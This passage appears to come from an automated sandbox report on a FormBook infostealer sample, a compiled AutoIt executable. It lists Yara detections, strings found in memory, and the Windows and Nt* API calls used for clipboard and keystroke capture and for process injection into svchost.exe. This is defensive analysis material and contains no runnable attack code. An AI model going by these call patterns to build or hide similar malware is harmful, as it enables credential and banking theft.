                Source: cttune.exe, 0000000A.00000002.2537131928.0000000007CD0000.00000004.00000800.00020000.00000000.sdmp, cttune.exe, 0000000A.00000002.2535844419.0000000005BB8000.00000004.10000000.00040000.00000000.sdmp, lxdvPfMVsD.exe, 0000000D.00000002.2533592399.00000000036D8000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.loopia.com/loopiadns/?utm_medium=sitelink&utm_source=loopia_parkingweb&utm_campaign=park
                Source: cttune.exe, 0000000A.00000002.2537131928.0000000007CD0000.00000004.00000800.00020000.00000000.sdmp, cttune.exe, 0000000A.00000002.2535844419.0000000005BB8000.00000004.10000000.00040000.00000000.sdmp, lxdvPfMVsD.exe, 0000000D.00000002.2533592399.00000000036D8000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.loopia.com/order/?utm_medium=sitelink&utm_source=loopia_parkingweb&utm_campaign=parkingw
                Source: cttune.exe, 0000000A.00000002.2537131928.0000000007CD0000.00000004.00000800.00020000.00000000.sdmp, cttune.exe, 0000000A.00000002.2535844419.0000000005BB8000.00000004.10000000.00040000.00000000.sdmp, lxdvPfMVsD.exe, 0000000D.00000002.2533592399.00000000036D8000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.loopia.com/sitebuilder/?utm_medium=sitelink&utm_source=loopia_parkingweb&utm_campaign=pa
                Source: cttune.exe, 0000000A.00000002.2537131928.0000000007CD0000.00000004.00000800.00020000.00000000.sdmp, cttune.exe, 0000000A.00000002.2535844419.0000000005BB8000.00000004.10000000.00040000.00000000.sdmp, lxdvPfMVsD.exe, 0000000D.00000002.2533592399.00000000036D8000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.loopia.com/support?utm_medium=sitelink&utm_source=loopia_parkingweb&utm_campaign=parking
                Source: cttune.exe, 0000000A.00000002.2537131928.0000000007CD0000.00000004.00000800.00020000.00000000.sdmp, cttune.exe, 0000000A.00000002.2535844419.0000000005BB8000.00000004.10000000.00040000.00000000.sdmp, lxdvPfMVsD.exe, 0000000D.00000002.2533592399.00000000036D8000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.loopia.com/woocommerce/?utm_medium=sitelink&utm_source=loopia_parkingweb&utm_campaign=pa
                Source: cttune.exe, 0000000A.00000002.2537131928.0000000007CD0000.00000004.00000800.00020000.00000000.sdmp, cttune.exe, 0000000A.00000002.2535844419.0000000005BB8000.00000004.10000000.00040000.00000000.sdmp, lxdvPfMVsD.exe, 0000000D.00000002.2533592399.00000000036D8000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.loopia.com/wordpress/?utm_medium=sitelink&utm_source=loopia_parkingweb&utm_campaign=park
                Source: cttune.exe, 0000000A.00000002.2537131928.0000000007CD0000.00000004.00000800.00020000.00000000.sdmp, cttune.exe, 0000000A.00000002.2535844419.0000000005BB8000.00000004.10000000.00040000.00000000.sdmp, lxdvPfMVsD.exe, 0000000D.00000002.2533592399.00000000036D8000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.loopia.se?utm_medium=sitelink&utm_source=loopia_parkingweb&utm_campaign=parkingweb
                Source: C:\Users\user\Desktop\new.exeCode function: 5_2_00C34164 OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,_wcscpy,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard,5_2_00C34164
                Source: C:\Users\user\Desktop\new.exeCode function: 5_2_00C34164 OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,_wcscpy,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard,5_2_00C34164
                Source: C:\Users\user\Desktop\new.exeCode function: 5_2_00C33F66 OpenClipboard,IsClipboardFormatAvailable,IsClipboardFormatAvailable,GetClipboardData,CloseClipboard,GlobalLock,CloseClipboard,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,DragQueryFileW,DragQueryFileW,DragQueryFileW,GlobalUnlock,CountClipboardFormats,CloseClipboard,5_2_00C33F66
                Source: C:\Users\user\Desktop\new.exeCode function: 5_2_00C2001C GetKeyboardState,SetKeyboardState,GetAsyncKeyState,GetAsyncKeyState,GetKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,5_2_00C2001C
                Source: C:\Users\user\Desktop\new.exeCode function: 5_2_00C4CABC DefDlgProcW,SendMessageW,GetWindowLongW,SendMessageW,SendMessageW,_wcsncpy,GetKeyState,GetKeyState,GetKeyState,SendMessageW,GetKeyState,SendMessageW,SendMessageW,SendMessageW,ImageList_SetDragCursorImage,ImageList_BeginDrag,SetCapture,ClientToScreen,ImageList_DragEnter,InvalidateRect,ReleaseCapture,GetCursorPos,ScreenToClient,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,GetCursorPos,ScreenToClient,GetParent,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,GetWindowLongW,5_2_00C4CABC

                E-Banking Fraud

                barindex
                Yara detected FormBook
                Source: Yara matchFile source: 7.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 7.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0000000D.00000002.2535533484.0000000005400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000A.00000002.2533835730.00000000032E0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000007.00000002.1897811815.0000000007850000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000A.00000002.2533575753.0000000003290000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000009.00000002.2533155385.0000000004350000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000007.00000002.1893344480.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000007.00000002.1894505430.0000000004BE0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000A.00000002.2530076362.0000000002E20000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY

                System Summary

                barindex
                Binary is likely a compiled AutoIt script file
                Source: C:\Users\user\Desktop\new.exeCode function: This is a third-party compiled AutoIt script.5_2_00BC3B3A
                Source: new.exeString found in binary or memory: This is a third-party compiled AutoIt script.
                Source: new.exe, 00000005.00000000.1271949253.0000000000C74000.00000002.00000001.01000000.00000004.sdmpString found in binary or memory: This is a third-party compiled AutoIt script.memstr_0d442cb3-8
                Source: new.exe, 00000005.00000000.1271949253.0000000000C74000.00000002.00000001.01000000.00000004.sdmpString found in binary or memory: SDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBox|SHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainer`memstr_77e2f752-6
                Source: new.exeString found in binary or memory: This is a third-party compiled AutoIt script.memstr_dc85968d-5
                Source: new.exeString found in binary or memory: SDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBox|SHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainer`memstr_184f8d1c-d
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_0042CCC3 NtClose,7_2_0042CCC3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03472B60 NtClose,LdrInitializeThunk,7_2_03472B60
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03472DF0 NtQuerySystemInformation,LdrInitializeThunk,7_2_03472DF0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_034735C0 NtCreateMutant,LdrInitializeThunk,7_2_034735C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03474340 NtSetContextThread,7_2_03474340
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03474650 NtSuspendThread,7_2_03474650
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03472BE0 NtQueryValueKey,7_2_03472BE0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03472BF0 NtAllocateVirtualMemory,7_2_03472BF0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03472B80 NtQueryInformationFile,7_2_03472B80
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03472BA0 NtEnumerateValueKey,7_2_03472BA0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03472AD0 NtReadFile,7_2_03472AD0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03472AF0 NtWriteFile,7_2_03472AF0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03472AB0 NtWaitForSingleObject,7_2_03472AB0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03472F60 NtCreateProcessEx,7_2_03472F60
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03472F30 NtCreateSection,7_2_03472F30
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03472FE0 NtCreateFile,7_2_03472FE0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03472F90 NtProtectVirtualMemory,7_2_03472F90
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03472FA0 NtQuerySection,7_2_03472FA0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03472FB0 NtResumeThread,7_2_03472FB0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03472E30 NtWriteVirtualMemory,7_2_03472E30
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03472EE0 NtQueueApcThread,7_2_03472EE0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03472E80 NtReadVirtualMemory,7_2_03472E80
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03472EA0 NtAdjustPrivilegesToken,7_2_03472EA0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03472D00 NtSetInformationFile,7_2_03472D00
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03472D10 NtMapViewOfSection,7_2_03472D10
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03472D30 NtUnmapViewOfSection,7_2_03472D30
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03472DD0 NtDelayExecution,7_2_03472DD0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03472DB0 NtEnumerateKey,7_2_03472DB0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03472C60 NtCreateKey,7_2_03472C60
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03472C70 NtFreeVirtualMemory,7_2_03472C70
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03472C00 NtQueryInformationProcess,7_2_03472C00
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03472CC0 NtQueryVirtualMemory,7_2_03472CC0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03472CF0 NtOpenProcess,7_2_03472CF0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03472CA0 NtQueryInformationToken,7_2_03472CA0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03473010 NtOpenDirectoryObject,7_2_03473010
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03473090 NtSetValueKey,7_2_03473090
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_034739B0 NtGetContextThread,7_2_034739B0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03473D70 NtOpenThread,7_2_03473D70
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03473D10 NtOpenProcessToken,7_2_03473D10
                Source: C:\Users\user\Desktop\new.exeCode function: 5_2_00C2A1EF: GetFullPathNameW,__swprintf,CreateDirectoryW,CreateFileW,_memset,_wcsncpy,DeviceIoControl,CloseHandle,RemoveDirectoryW,CloseHandle,5_2_00C2A1EF
                Source: C:\Users\user\Desktop\new.exeCode function: 5_2_00C185B1 GetCurrentProcess,OpenProcessToken,CreateEnvironmentBlock,CloseHandle,CreateProcessWithLogonW,DestroyEnvironmentBlock,5_2_00C185B1
                Source: C:\Users\user\Desktop\new.exeCode function: 5_2_00C251BD ExitWindowsEx,InitiateSystemShutdownExW,SetSystemPowerState,5_2_00C251BD
                Source: C:\Users\user\Desktop\new.exeCode function: 5_2_00BCE6A05_2_00BCE6A0
                Source: C:\Users\user\Desktop\new.exeCode function: 5_2_00BED9755_2_00BED975
                Source: C:\Users\user\Desktop\new.exeCode function: 5_2_00BCFCE05_2_00BCFCE0
                Source: C:\Users\user\Desktop\new.exeCode function: 5_2_00BE21C55_2_00BE21C5
                Source: C:\Users\user\Desktop\new.exeCode function: 5_2_00BF62D25_2_00BF62D2
                Source: C:\Users\user\Desktop\new.exeCode function: 5_2_00C403DA5_2_00C403DA
                Source: C:\Users\user\Desktop\new.exeCode function: 5_2_00BF242E5_2_00BF242E
                Source: C:\Users\user\Desktop\new.exeCode function: 5_2_00BE25FA5_2_00BE25FA
                Source: C:\Users\user\Desktop\new.exeCode function: 5_2_00BD66E15_2_00BD66E1
                Source: C:\Users\user\Desktop\new.exeCode function: 5_2_00C1E6165_2_00C1E616
                Source: C:\Users\user\Desktop\new.exeCode function: 5_2_00BF878F5_2_00BF878F
                Source: C:\Users\user\Desktop\new.exeCode function: 5_2_00C288895_2_00C28889
                Source: C:\Users\user\Desktop\new.exeCode function: 5_2_00C408575_2_00C40857
                Source: C:\Users\user\Desktop\new.exeCode function: 5_2_00BD88085_2_00BD8808
                Source: C:\Users\user\Desktop\new.exeCode function: 5_2_00BF68445_2_00BF6844
                Source: C:\Users\user\Desktop\new.exeCode function: 5_2_00BECB215_2_00BECB21
                Source: C:\Users\user\Desktop\new.exeCode function: 5_2_00BF6DB65_2_00BF6DB6
                Source: C:\Users\user\Desktop\new.exeCode function: 5_2_00BD6F9E5_2_00BD6F9E
                Source: C:\Users\user\Desktop\new.exeCode function: 5_2_00BD30305_2_00BD3030
                Source: C:\Users\user\Desktop\new.exeCode function: 5_2_00BE31875_2_00BE3187
                Source: C:\Users\user\Desktop\new.exeCode function: 5_2_00BEF1D95_2_00BEF1D9
                Source: C:\Users\user\Desktop\new.exeCode function: 5_2_00BC12875_2_00BC1287
                Source: C:\Users\user\Desktop\new.exeCode function: 5_2_00BE14845_2_00BE1484
                Source: C:\Users\user\Desktop\new.exeCode function: 5_2_00BD55205_2_00BD5520
                Source: C:\Users\user\Desktop\new.exeCode function: 5_2_00BE76965_2_00BE7696
                Source: C:\Users\user\Desktop\new.exeCode function: 5_2_00BD57605_2_00BD5760
                Source: C:\Users\user\Desktop\new.exeCode function: 5_2_00BE19785_2_00BE1978
                Source: C:\Users\user\Desktop\new.exeCode function: 5_2_00BF9AB55_2_00BF9AB5
                Source: C:\Users\user\Desktop\new.exeCode function: 5_2_00BEBDA65_2_00BEBDA6
                Source: C:\Users\user\Desktop\new.exeCode function: 5_2_00C47DDB5_2_00C47DDB
                Source: C:\Users\user\Desktop\new.exeCode function: 5_2_00BE1D905_2_00BE1D90
                Source: C:\Users\user\Desktop\new.exeCode function: 5_2_00BD3FE05_2_00BD3FE0
                Source: C:\Users\user\Desktop\new.exeCode function: 5_2_00BCDF005_2_00BCDF00
                Source: C:\Users\user\Desktop\new.exeCode function: 5_2_00F5D6005_2_00F5D600
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_00401C667_2_00401C66
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_00418D337_2_00418D33
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_004030457_2_00403045
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_004030507_2_00403050
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_0040E8EA7_2_0040E8EA
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_0040E8F37_2_0040E8F3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_0040296B7_2_0040296B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_004029707_2_00402970
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_00404A477_2_00404A47
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_0042F2B37_2_0042F2B3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_004014407_2_00401440
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_004034207_2_00403420
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_0041056A7_2_0041056A
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_004105737_2_00410573
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_004025C67_2_004025C6
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_004025D07_2_004025D0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_00402E2E7_2_00402E2E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_00402E307_2_00402E30
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_00416F1E7_2_00416F1E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_00416F237_2_00416F23
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_004107937_2_00410793
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_0040E79A7_2_0040E79A
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_0040E7A37_2_0040E7A3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_034FA3527_2_034FA352
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_0344E3F07_2_0344E3F0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_035003E67_2_035003E6
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_034E02747_2_034E0274
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_034C02C07_2_034C02C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_034C81587_2_034C8158
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_034301007_2_03430100
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_034DA1187_2_034DA118
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_034F81CC7_2_034F81CC
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_034F41A27_2_034F41A2
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_035001AA7_2_035001AA
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_034D20007_2_034D2000
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_034647507_2_03464750
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_034407707_2_03440770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_0343C7C07_2_0343C7C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_0345C6E07_2_0345C6E0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_034405357_2_03440535
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_035005917_2_03500591
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_034F24467_2_034F2446
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_034E44207_2_034E4420
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_034EE4F67_2_034EE4F6
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_034FAB407_2_034FAB40
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_034F6BD77_2_034F6BD7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_0343EA807_2_0343EA80
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_034569627_2_03456962
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_034429A07_2_034429A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_0350A9A67_2_0350A9A6
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_0344A8407_2_0344A840
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_034428407_2_03442840
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_0346E8F07_2_0346E8F0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_034268B87_2_034268B8
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_034B4F407_2_034B4F40
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03482F287_2_03482F28
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03460F307_2_03460F30
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_034E2F307_2_034E2F30
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03432FC87_2_03432FC8
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_0344CFE07_2_0344CFE0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_034BEFA07_2_034BEFA0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03440E597_2_03440E59
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_034FEE267_2_034FEE26
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_034FEEDB7_2_034FEEDB
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03452E907_2_03452E90
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_034FCE937_2_034FCE93
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_0344AD007_2_0344AD00
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_034DCD1F7_2_034DCD1F
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_0343ADE07_2_0343ADE0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03458DBF7_2_03458DBF
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03440C007_2_03440C00
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03430CF27_2_03430CF2
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_034E0CB57_2_034E0CB5
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_0342D34C7_2_0342D34C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_034F132D7_2_034F132D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_0348739A7_2_0348739A
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_0345B2C07_2_0345B2C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_034E12ED7_2_034E12ED
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_034452A07_2_034452A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_0347516C7_2_0347516C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_0342F1727_2_0342F172
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_0350B16B7_2_0350B16B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_0344B1B07_2_0344B1B0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_034EF0CC7_2_034EF0CC
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_034470C07_2_034470C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_034F70E97_2_034F70E9
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_034FF0E07_2_034FF0E0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_034317EC7_2_034317EC
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_034FF7B07_2_034FF7B0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_034856307_2_03485630
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_034F16CC7_2_034F16CC
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_034F75717_2_034F7571
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_034DD5B07_2_034DD5B0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_034314607_2_03431460
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_034FF43F7_2_034FF43F
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_034FFB767_2_034FFB76
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_034B5BF07_2_034B5BF0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_0347DBF97_2_0347DBF9
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_0345FB807_2_0345FB80
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_034FFA497_2_034FFA49
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_034F7A467_2_034F7A46
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_034B3A6C7_2_034B3A6C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_034EDAC67_2_034EDAC6
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_034DDAAC7_2_034DDAAC
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03485AA07_2_03485AA0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_034E1AA37_2_034E1AA3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_034499507_2_03449950
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_0345B9507_2_0345B950
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_034D59107_2_034D5910
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_034AD8007_2_034AD800
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_034438E07_2_034438E0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_034FFF097_2_034FFF09
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03441F927_2_03441F92
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_034FFFB17_2_034FFFB1
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03449EB07_2_03449EB0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03443D407_2_03443D40
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_034F1D5A7_2_034F1D5A
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_034F7D737_2_034F7D73
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_0345FDC07_2_0345FDC0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_034B9C327_2_034B9C32
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_034FFCF27_2_034FFCF2
                Source: C:\Program Files (x86)\UEACZCNvmbEMahLfhDuruOcQkVbiacqiTaMWaMOunGFzfRFkHXvJkEsQTKCtvjY\lxdvPfMVsD.exeCode function: 9_2_046334D59_2_046334D5
                Source: C:\Program Files (x86)\UEACZCNvmbEMahLfhDuruOcQkVbiacqiTaMWaMOunGFzfRFkHXvJkEsQTKCtvjY\lxdvPfMVsD.exeCode function: 9_2_0465DD419_2_0465DD41
                Source: C:\Program Files (x86)\UEACZCNvmbEMahLfhDuruOcQkVbiacqiTaMWaMOunGFzfRFkHXvJkEsQTKCtvjY\lxdvPfMVsD.exeCode function: 9_2_0463EFF89_2_0463EFF8
                Source: C:\Program Files (x86)\UEACZCNvmbEMahLfhDuruOcQkVbiacqiTaMWaMOunGFzfRFkHXvJkEsQTKCtvjY\lxdvPfMVsD.exeCode function: 9_2_046477B59_2_046477B5
                Source: C:\Program Files (x86)\UEACZCNvmbEMahLfhDuruOcQkVbiacqiTaMWaMOunGFzfRFkHXvJkEsQTKCtvjY\lxdvPfMVsD.exeCode function: 9_2_0463F0019_2_0463F001
                Source: C:\Program Files (x86)\UEACZCNvmbEMahLfhDuruOcQkVbiacqiTaMWaMOunGFzfRFkHXvJkEsQTKCtvjY\lxdvPfMVsD.exeCode function: 9_2_046459AC9_2_046459AC
                Source: C:\Program Files (x86)\UEACZCNvmbEMahLfhDuruOcQkVbiacqiTaMWaMOunGFzfRFkHXvJkEsQTKCtvjY\lxdvPfMVsD.exeCode function: 9_2_046459B19_2_046459B1
                Source: C:\Program Files (x86)\UEACZCNvmbEMahLfhDuruOcQkVbiacqiTaMWaMOunGFzfRFkHXvJkEsQTKCtvjY\lxdvPfMVsD.exeCode function: 9_2_0463F2219_2_0463F221
